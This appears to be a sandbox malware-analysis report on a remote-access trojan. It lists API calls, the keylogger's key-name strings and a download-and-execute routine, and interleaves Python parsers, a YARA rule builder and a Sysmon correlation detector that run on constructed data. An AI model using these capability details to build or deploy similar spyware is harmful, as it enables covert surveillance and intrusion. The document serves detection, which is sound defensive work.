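        "is_directory": bool(attrs & FILE_ATTRIBUTE_DIRECTORY),
        "created": filetime_to_datetime(ctime),
        "accessed": filetime_to_datetime(atime),
        "modified": filetime_to_datetime(wtime),
        "size": (size_hi << 32) | size_lo,
        "name": _wstr(name_raw),
        "short_name": _wstr(alt_raw),
    }


def iter_records(blob):
    """Split a buffer of back-to-back records, e.g. carved from a dump."""
    for off in range(0, len(blob) - FIND_DATA_SIZE + 1, FIND_DATA_SIZE):
        yield parse_find_data(blob[off:off + FIND_DATA_SIZE])


def name_matches(name, needle):
    """Same test as the sample: lowercase, then plain substring search."""
    return needle.lower() in name.lower()


def should_recurse(rec):
    """Same test as the sample: directory bit set and not '.' or '..'."""
    return rec["is_directory"] and rec["name"] not in (".", "..")


def build_find_data(name, size=0, attrs=0x20,
                    when=datetime(2020, 11, 19, 12, 0, tzinfo=timezone.utc)):
    """Construct a record for testing (hypothetical data, not from the sample)."""
    name_raw = name.encode("utf-16-le")
    if len(name_raw) > 520 - 2:
        raise ValueError("name too long for cFileName")
    ft = datetime_to_filetime(when)
    return struct.pack(_FMT, attrs, ft, ft, ft,
                       (size >> 32) & 0xFFFFFFFF, size & 0xFFFFFFFF, 0, 0,
                       name_raw.ljust(520, b"\x00"), b"\x00" * 28)


# Constructed listing, as the RAT would serialize one directory's entries.
SAMPLE_LISTING = b"".join([
    build_find_data(".", attrs=0x10),
    build_find_data("..", attrs=0x10),
    build_find_data("Documents", attrs=0x10),
    build_find_data("Passwords.TXT", size=0x1_0000_0010),
])


def search_listing(blob, needle):
    """Names the sample's filter would report for this search term."""
    return [r["name"] for r in iter_records(blob) if name_matches(r["name"], needle)]


if __name__ == "__main__":
    for rec in iter_records(SAMPLE_LISTING):
        kind = "dir " if rec["is_directory"] else "file"
        print(f"{kind} {rec['size']:>12} {rec['modified']:%Y-%m-%d %H:%M} {rec['name']}")
```

When decoding data carved from a dump, look for the 520-byte UTF-16 name field rather than the attribute DWORD: a run of records is easy to spot because the alignment repeats every 0x250 bytes, and the size split into nFileSizeHigh/nFileSizeLow is a quick sanity check that the record boundary is right.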
                                  Disassembly address column only (instruction text not captured): 0x00404c16 - 0x00404e9e

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                  • wcscmp.MSVCRT ref: 00404CCA
                                  • wcscmp.MSVCRT ref: 00404CE2
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                    • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,?,?), ref: 00404D7C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                  • String ID:
                                  • API String ID: 1504175218-0
                                  • Opcode ID: 9bf66997af9dd352d6e04f327307b06a99af4f692c5171a00be40cd7f22b4158
                                  • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                  • Opcode Fuzzy Hash: 9bf66997af9dd352d6e04f327307b06a99af4f692c5171a00be40cd7f22b4158
                                  • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,745E73F0,?), ref: 0040616A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B28,?), ref: 004066F4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B04,?,?,?,?,00000001), ref: 00406846
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                  • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up]
                                  • API String ID: 4257247948-3968991301
                                  • Opcode ID: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                  • Instruction ID: 32f1d40ca48953741c1d4852e97a1265af2d0dfb925f912298a01a30ea5beda6
                                  • Opcode Fuzzy Hash: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                  • Instruction Fuzzy Hash: 7D32B072A04509BBDB04B6ACC996CFF3A7DE641340B51097BE813B71C2F839596852EF
                                  Uniqueness

                                  Uniqueness Score: -1.00%
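The String ID list above is the key-name table the keylogger uses when it writes non-printable keys to its log (" [BckSp]", " [Enter]", " [PagDw]" and so on), built here as narrow std::string objects. Two of the spellings, "[BckSp]" and "[PagDw]", are not the usual ones, which makes the table a good hunting anchor. The Python below is an added example, not code from the report or the sample: it scans a byte buffer (a process memory dump or a file) for the table in both ASCII and UTF-16LE form, scores coverage so that the handful of tokens ordinary software also prints does not fire on its own, and emits an equivalent YARA rule. The buffers it scans are constructed.

```python
"""Hunt for the keylogger key-name table listed at 0x0040616A-0x00406846.

Added example, not from the report or the sample. SAMPLE_DUMP and
BENIGN_BLOB are constructed inputs.
"""

# Token set taken from the report's String ID list (leading spaces dropped).
KEY_TOKENS = (
    "[BckSp]", "[Del]", "[Down]", "[End]", "[Enter]", "[Esc]",
    "[F1]", "[F2]", "[F3]", "[F4]", "[F5]", "[F6]", "[F7]", "[F8]", "[F9]",
    "[F10]", "[F11]", "[F12]", "[Left]", "[PagDw]", "[PagUp]", "[Pause]",
    "[Print]", "[Right]", "[Start]", "[Tab]", "[Up]",
)

# Tokens that benign software (installers, TUIs, help text) also prints.
# Alone they are not evidence; the unusual spellings are what matter.
COMMON_TOKENS = frozenset({
    "[Enter]", "[Esc]", "[Tab]", "[Del]", "[End]",
    "[Up]", "[Down]", "[Left]", "[Right]",
})


def find_key_tokens(data):
    """Map each token found to (encoding, offset of first occurrence)."""
    found = {}
    for tok in KEY_TOKENS:
        for enc in ("ascii", "utf-16-le"):
            off = data.find(tok.encode(enc))
            if off != -1:
                found[tok] = (enc, off)
                break
    return found


def score_keylog_table(data, threshold=0.75, min_distinctive=5):
    """Coverage of the table plus a floor on tokens benign code rarely has."""
    found = find_key_tokens(data)
    distinctive = [t for t in found if t not in COMMON_TOKENS]
    ratio = len(found) / len(KEY_TOKENS)
    return {
        "found": len(found),
        "distinctive": len(distinctive),
        "ratio": round(ratio, 2),
        "match": ratio >= threshold and len(distinctive) >= min_distinctive,
    }


def yara_rule(name="keylog_keyname_table", min_tokens=20):
    """Same test expressed as a YARA rule (hypothetical rule name)."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, tok in enumerate(KEY_TOKENS):
        lines.append(f'        $k{i} = "{tok}" ascii wide')
    lines += ["    condition:", f"        {min_tokens} of ($k*)", "}"]
    return "\n".join(lines)


# Constructed: the table as NUL-separated narrow strings with the leading
# space seen in the report, surrounded by padding.
SAMPLE_DUMP = (b"\x00" * 32
               + b"\x00".join(b" " + t.encode("ascii") for t in KEY_TOKENS)
               + b"\x00" * 32)

# Constructed: a benign wide-string prompt that shares two tokens.
BENIGN_BLOB = "Press [Enter] to continue or [Esc] to quit".encode("utf-16-le")


if __name__ == "__main__":
    print("sample dump:", score_keylog_table(SAMPLE_DUMP))
    print("benign blob:", score_keylog_table(BENIGN_BLOB))
    print(yara_rule())
```

Run the scorer over the unpacked image or a dump of the host process rather than the packed dropper; the report locates this table in the 0x400000 memory dump of process 2, not necessarily in the file on disk.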

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                  • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                  • free.MSVCRT(?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,?), ref: 0040D643
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  • open, xrefs: 0040D5BA
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040D636
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                  • API String ID: 2294739476-3056885514
                                  • Opcode ID: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                  • Opcode Fuzzy Hash: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%
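This function is the download-and-execute command: URLDownloadToFileW at 0x0040D585 writes the fetched file to a path built from wide strings, and ShellExecuteW at 0x0040D5C0 launches it with the "open" verb; the RegAsm.exe path is referenced as a string in the same function. On the endpoint that sequence leaves a distinctive pair of events: the process that wrote the file is the parent of the process created from it a moment later. The Python below is an added example, not code from the report or the sample: it correlates Sysmon-style FileCreate (Event ID 11) and ProcessCreate (Event ID 1) records and flags a launch whose image was written, within a short window, by the process that becomes its parent. The event records are constructed; using RegAsm.exe as the writer is an assumption for the example, since the page does not show what the path is used for here.

```python
"""Detect the URLDownloadToFileW -> ShellExecuteW("open") pattern in telemetry.

Added example, not from the report or the sample. Field names follow the
Sysmon schema (Event ID 11 FileCreate, Event ID 1 ProcessCreate); the
SAMPLE_EVENTS are constructed, including the choice of RegAsm.exe as writer.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # how long after the write a launch still counts


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def find_download_and_execute(events, window=WINDOW):
    """Flag ProcessCreate events whose Image was written, within `window`,
    by the process that is now the parent. Keying on (pid, path) and the
    window keeps PID reuse from producing false pairs."""
    recent_writes = {}
    hits = []
    for ev in sorted(events, key=lambda e: _ts(e["UtcTime"])):
        if ev["EventID"] == 11:
            recent_writes[(ev["ProcessId"], ev["TargetFilename"].lower())] = ev
        elif ev["EventID"] == 1:
            write = recent_writes.get((ev["ParentProcessId"], ev["Image"].lower()))
            if write is None:
                continue
            delay = _ts(ev["UtcTime"]) - _ts(write["UtcTime"])
            if timedelta(0) <= delay <= window:
                hits.append({
                    "writer": write["Image"],
                    "dropped": ev["Image"],
                    "child_pid": ev["ProcessId"],
                    "delay_s": delay.total_seconds(),
                })
    return hits


# Constructed events. The first pair mimics the RAT host fetching a file and
# opening it; the second pair is a browser download the user later runs from
# Explorer, which must not fire because the parent differs.
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
SAMPLE_EVENTS = [
    {"EventID": 11, "UtcTime": "2020-11-19 10:00:01.250", "ProcessId": 4412,
     "Image": REGASM,
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\update.exe"},
    {"EventID": 1, "UtcTime": "2020-11-19 10:00:03.000", "ProcessId": 5008,
     "Image": r"C:\Users\user\AppData\Local\Temp\update.exe",
     "ParentProcessId": 4412, "ParentImage": REGASM},
    {"EventID": 11, "UtcTime": "2020-11-19 10:05:00.000", "ProcessId": 2200,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\user\Downloads\setup.exe"},
    {"EventID": 1, "UtcTime": "2020-11-19 10:06:00.000", "ProcessId": 6100,
     "Image": r"C:\Users\user\Downloads\setup.exe",
     "ParentProcessId": 1234, "ParentImage": r"C:\Windows\explorer.exe"},
]


if __name__ == "__main__":
    for hit in find_download_and_execute(SAMPLE_EVENTS):
        print(hit)
```

The "open" verb goes through the file association, so if the fetched file is not a PE (a script, an HTA, a shortcut) the child Image will be the handler and the path will appear in its CommandLine instead; extend the key to the command line when that matters. The check is deliberately indifferent to which process does the writing: RegAsm.exe is only the constructed example's host.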

                                  APIs
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6B015DF0), ref: 0041016E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                  • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                    • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                    • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                    • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                  • String ID:
                                  • API String ID: 1196022968-0
                                  • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                  • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                  • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00403379
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898,?,?,00000000), ref: 00403392
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,?,?,00000000), ref: 00403399
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 004033A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004033C4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004033CE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004033D7
                                  • FindNextFileW.KERNEL32(?,?), ref: 004033ED
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00403402
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403411
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040341D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040342F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040344A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000050), ref: 0040345F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
